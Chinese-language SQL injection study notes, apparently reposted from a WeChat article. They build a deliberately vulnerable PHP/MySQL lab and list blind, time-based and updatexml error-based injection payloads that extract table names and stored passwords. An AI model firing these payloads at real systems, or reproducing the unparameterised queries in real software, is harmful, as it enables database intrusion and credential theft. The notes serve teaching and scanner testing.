Scribd
Upload
25 views13 pages

SQL注入笔记

Uploaded by

pcm000002
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
25 views13 pages

SQL注入笔记

Uploaded by

pcm000002
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 13

2024/2/6 14:51 SQL注入笔记

SQL注入笔记
原创 鬼麦子 鬼麦子 2022-11-02 19:20 陕西

只是一个针对与MySQL的SQL注入笔记,便于我之后速查,和扫描器优化,年龄大了总是忘
记东西,得整点详细点系统性的速查笔记。

理论&环境
测试环境

ubuntu20+mysql8.0+php7.4

SQL注入分类:

报错注入

盲注

延时注入

以及因为SQL语法的拼接和注入点的位置分为:

where注入

like注入

insert/update

order by

以及其他位置处SQL语句拼接

库名:example_vul

https://mp.weixin.qq.com/s/NMM-C7ZuzBtIzhwLzmRtLw 1/13
2024/2/6 14:51 SQL注入笔记

建表

CREATE TABLE `user`


( id INT NOT NULL AUTO_INCREMENT,
name VARCHAR(50) NOT NULL,
password VARCHAR(50) NOT NULL,
PRIMARY KEY ( `id` )
) ENGINE=InnoDB DEFAULT CHARSET=utf8;;

INSERT INTO `user` ( name, password ) VALUES ( 'admin', 'admin123');


INSERT INTO `user` ( name, password ) VALUES ( 'user', 'user123');

php代码

https://mp.weixin.qq.com/s/NMM-C7ZuzBtIzhwLzmRtLw 2/13
2024/2/6 14:51 SQL注入笔记

<?php
//数据库连接
ini_set("display_errors", "On"); //报错显示
error_reporting(E_ALL | E_STRICT);
//http://192.168.72.6/example_vul/2.php
$con = mysqli_connect('localhost', 'debian-sys-maint', 'aaaa','example_vul');
if (!$con) {
die('Could not connect: ' . mysqli_error());
}
$method=$_GET['method'];
if($method=='where_int'){
//where数字型注入
//http://192.168.72.6/example_vul/2.php?method=where_int&id=1
$id=$_GET['id'];
$query = "SELECT * FROM user where id =$id";
$result = $con->query($query) or die( '<pre>database error... </pre>' );
while( $row = mysqli_fetch_assoc( $result ) ) {
$data=array("id"=> $row['id'],"name"=> $row['name']);
}
echo json_encode($data);

}elseif($method=='like'){
//like类型注入
//http://192.168.72.6/example_vul/2.php?method=like&name=a
$name=$_GET['name'];
$query = "SELECT * FROM `user` where name LIKE '%$name%'";
$result = $con->query($query) or die( '<pre>database error... </pre>' );
while( $row = mysqli_fetch_assoc( $result ) ) {
$data=array("id"=> $row['id'],"name"=> $row['name']);
}
echo json_encode($data);

https://mp.weixin.qq.com/s/NMM-C7ZuzBtIzhwLzmRtLw 3/13
2024/2/6 14:51 SQL注入笔记

}elseif($method=='insert'){
//insert类型注入
//http://192.168.72.6/example_vul/2.php?method=insert&password=aaaaaaa
$password=$_GET['password'];
$query = "INSERT INTO user ( name, password ) VALUES ( 'user', '$password' );";
$result = $con->query($query) or die( '<pre>database error... </pre>' );
echo 'insert ok!';

}elseif($method=='order_by'){
//order by类型注入
//http://192.168.72.6/example_vul/2.php?method=order_by&order=asc
$order=$_GET['order'];
$query = "SELECT * FROM `user` order by name $order";
$result = $con->query($query) or die( '<pre>database error... </pre>' );
while( $row = mysqli_fetch_assoc( $result ) ) {
$data=array("id"=> $row['id'],"name"=> $row['name']);
}
echo json_encode($data);

}elseif($method=='where_string'){
//where字符型注入
//http://192.168.72.6/example_vul/2.php?method=where_string&name=admin
$name=$_GET['name'];
$query = "SELECT * FROM user where name ='$name'";
$result = $con->query($query) or die( '<pre>database error... </pre>' );
while( $row = mysqli_fetch_assoc( $result ) ) {
$data=array("id"=> $row['id'],"name"=> $row['name']);
}
echo json_encode($data);

}elseif($method=='where'){
//where报错注入

https://mp.weixin.qq.com/s/NMM-C7ZuzBtIzhwLzmRtLw 4/13
2024/2/6 14:51 SQL注入笔记

//http://192.168.72.6/example_vul/2.php?method=where&id=1
$id=$_GET['id'];
$query = "SELECT * FROM user where id =$id";
$result = $con->query($query) or die( 'error: '. $con -> error );;
while( $row = mysqli_fetch_assoc( $result ) ) {
//$data=array("id"=> $row['id'],"name"=> $row['name']);
echo $row['id']."<br>";
echo $row['name'];

}
//echo json_encode($data);
}

出数据
1. 按照实战需求,要搞到数据列password的数据。

2. 按照挖SRC标准规定,要搞到表名。

3. 按照扫描器的需求,是要完成一次判断,异常和异常闭合来确认漏洞存在。

盲注步骤

1. 判断是否为sql注入

2. 获得数据库名

3. 通过数据库名获得表名

4. 通过表名得到列名

5. 再通过列名,得到数据。

所以目标清晰,开搞!

https://mp.weixin.qq.com/s/NMM-C7ZuzBtIzhwLzmRtLw 5/13
2024/2/6 14:51 SQL注入笔记

where数字型注入

判断是否为sql注入:

http://192.168.72.6/example_vul/2.php?method=where_int&id=1

对应执行的sql语句: SELECT * FROM user where id =1

http://192.168.72.6/example_vul/2.php?method=where_int&id=1-1 等于false

对应执行的sql语句: SELECT * FROM user where id =1-1

http://192.168.72.6/example_vul/2.php?method=where_int&id=1-0 等于true

对应执行的sql语句: SELECT * FROM user where id =1-0

判断数据库名长度length(database())

http://192.168.72.6/example_vul/2.php?method=where_int&id=1 and
if(length(database())=11,1,exp(11111111111111))

对应执行的sql语句: SELECT * FROM user where id =1 and


if(length(database())=11,1,exp(11111111111111))

获取数据库名,database()的值example_vul

http://192.168.72.6/example_vul/2.php?method=where_int&id=1 and if(database()


regexp '^e',1,exp(11111111111111))

https://mp.weixin.qq.com/s/NMM-C7ZuzBtIzhwLzmRtLw 6/13
2024/2/6 14:51 SQL注入笔记

通过burp intruder的功能,穷举遍历database()的值,之后的表名、列名、数据,都是如
此。

http://192.168.72.6/example_vul/2.php?method=where_int&id=1 and if(database()


regexp '^example_vul',1,exp(11111111111111))

对应执行的sql语句: SELECT * FROM user where id =1 and if(database() regexp


'^example_vul',1,exp(11111111111111))

获取表名 regexp '^user'

http://192.168.72.6/example_vul/2.php?method=where_int&id=1 and if((select


TABLE_NAME from information_schema.TABLES where
TABLE_SCHEMA='example_vul' limit 2,1) regexp '^user',1,exp(11111111111111))

对应执行的sql语句: SELECT * FROM user where id =1 and if((select TABLE_NAME


from information_schema.TABLES where TABLE_SCHEMA='example_vul' limit 2,1)
regexp '^user',1,exp(11111111111111))

https://mp.weixin.qq.com/s/NMM-C7ZuzBtIzhwLzmRtLw 7/13
2024/2/6 14:51 SQL注入笔记

获取列名 regexp '^password'

http://192.168.72.6/example_vul/2.php?method=where_int&id=1 and if((select


COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME = 'user'
limit 2,1) regexp '^password',1,exp(11111111111111))

对应执行的sql语句: SELECT * FROM user where id =1 and if((select


COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME = 'user'
limit 2,1) regexp '^password',1,exp(11111111111111));

获取数据 '^admin123'

http://192.168.72.6/example_vul/2.php?method=where_int&id=1 and if((select


password from user limit 0,1) regexp '^admin123',1,exp(11111111111111))

对应执行的sql语句: SELECT * FROM user where id =1 and if((select password from


user limit 0,1) regexp '^admin123',1,exp(11111111111111))

like类型注入

相比于where就只是拼接的语句不一样。

判断是否为注入

http://192.168.72.6/example_vul/2.php?method=like&name=a

http://192.168.72.6/example_vul/2.php?method=like&name=a' 等于false

http://192.168.72.6/example_vul/2.php?method=like&name=a%'and'1 等于true

https://mp.weixin.qq.com/s/NMM-C7ZuzBtIzhwLzmRtLw 8/13
2024/2/6 14:51 SQL注入笔记

获取表名 regexp '^user'

http://192.168.72.6/example_vul/2.php?method=like&name=a%'and if((select
TABLE_NAME from information_schema.TABLES where
TABLE_SCHEMA='example_vul' limit 2,1) regexp '^user',1,exp(11111111111111))
and'1

对应执行的sql语句: SELECT * FROM user where name LIKE '%a* %'and if((select
TABLE_NAME from information_schema.TABLES where
TABLE_SCHEMA='example_vul' limit 2,1) regexp '^user',1,exp(11111111111111))
and'1 ';

获取数据 '^admin123'

http://192.168.72.6/example_vul/2.php?method=like&name=a%'and if((select
password from user limit 0,1) regexp '^admin123',1,exp(11111111111111)) and'1

对应执行的sql语句: SELECT * FROM user where name LIKE '%a%'and if((select


password from user limit 0,1) regexp '^admin123',1,exp(11111111111111)) and'1';

insert类型注入,update/delete 同理

在insert盲注时 select查询同一个表时会出现You can’t specify target table ‘message’ for


update in FROM clause,所以payload要改下,解决方法:select的结果再通过一个中间表
select多一次,就可以避免这个错误。

http://192.168.72.6/example_vul/2.php?method=insert&password=aaaaaaa 替换参数值
进行注入

判断是否为注入

http://192.168.72.6/example_vul/2.php?method=insert&password=1'and a and'
等于false

https://mp.weixin.qq.com/s/NMM-C7ZuzBtIzhwLzmRtLw 9/13
2024/2/6 14:51 SQL注入笔记

http://192.168.72.6/example_vul/2.php?method=insert&password=1'and 1 and'
等于true

获取数据 '^admin123'

http://192.168.72.6/example_vul/2.php?method=insert&password=11'and if((select
password from (SELECT password FROM user) as aaaaaa limit 0,1) regexp
'^admin123',1,exp(11111111111111)) and'

对应执行的sql语句: INSERT INTO user ( name, password ) VALUES ( 'user', '1'and


if((select password from (SELECT password FROM user) as aaaaaa limit 0,1) regexp
'^admin123',1,exp(11111111111111)) and'' );

order by类型注入

http://192.168.72.6/example_vul/2.php?method=order_by&order=asc 替换参数值进行注

判断是否为注入

http://192.168.72.6/example_vul/2.php?method=order_by&order=asc,333333333333
等于false

http://192.168.72.6/example_vul/2.php?method=order_by&order=asc,1 等于true

获取数据 '^admin123'

http://192.168.72.6/example_vul/2.php?method=order_by&order=,if((select password
from user limit 0,1) regexp '^admin123',1,exp(11111111111111)) asc

对应执行的sql语句: SELECT * FROM user order by name ,if((select password from


user limit 0,1) regexp '^admin123',1,exp(11111111111111)) asc;

https://mp.weixin.qq.com/s/NMM-C7ZuzBtIzhwLzmRtLw 10/13
2024/2/6 14:51 SQL注入笔记

where字符型注入

之前都是if判断,这次用下case when 1 then 1 else exp(111111) end

http://192.168.72.6/example_vul/2.php?method=where_string&name=admin

判断是否为注入

http://192.168.72.6/example_vul/2.php?method=where_string&name=admi
n'axd'999999 等于false

http://192.168.72.6/example_vul/2.php?method=where_string&name=admi
n'and'999999 等于true

获取数据 '^admin123'

http://192.168.72.6/example_vul/2.php?method=where_string&name=admin' and
case when (select password from user limit 0,1) regexp '^admin123' then 1 else
exp(1111111111111) end and'1

对应执行的sql语句: SELECT * FROM user where name ='admin' and case when
(select password from user limit 0,1) regexp '^admin123' then 1 else
exp(1111111111111) end and'1';

延时注入,因为没有回显,没有响应内容所以不能布尔型盲注,就需要用到延时注入,只需
要替换exp()这个函数改为,sleep(3)或者benchmark(10000000,sha(1)) ,通过响应时间作为
参考,来进行SQL注入。

报错注入,通过一些函数,直接出数据,不在需要穷举来判断。

https://mp.weixin.qq.com/s/NMM-C7ZuzBtIzhwLzmRtLw 11/13
2024/2/6 14:51 SQL注入笔记

http://192.168.72.6/example_vul/2.php?method=where&id=1 and
updatexml(1,concat(0x7e,(select database()),0x7e),1)

http://192.168.72.6/example_vul/2.php?method=where&id=1 and
updatexml(1,concat(0x7e,(select password from user limit 0,1),0x7e),1)

https://mp.weixin.qq.com/s/NMM-C7ZuzBtIzhwLzmRtLw 12/13
2024/2/6 14:51 SQL注入笔记

喜欢此内容的人还喜欢

什么是黑客
鬼麦子

https://mp.weixin.qq.com/s/NMM-C7ZuzBtIzhwLzmRtLw 13/13

You might also like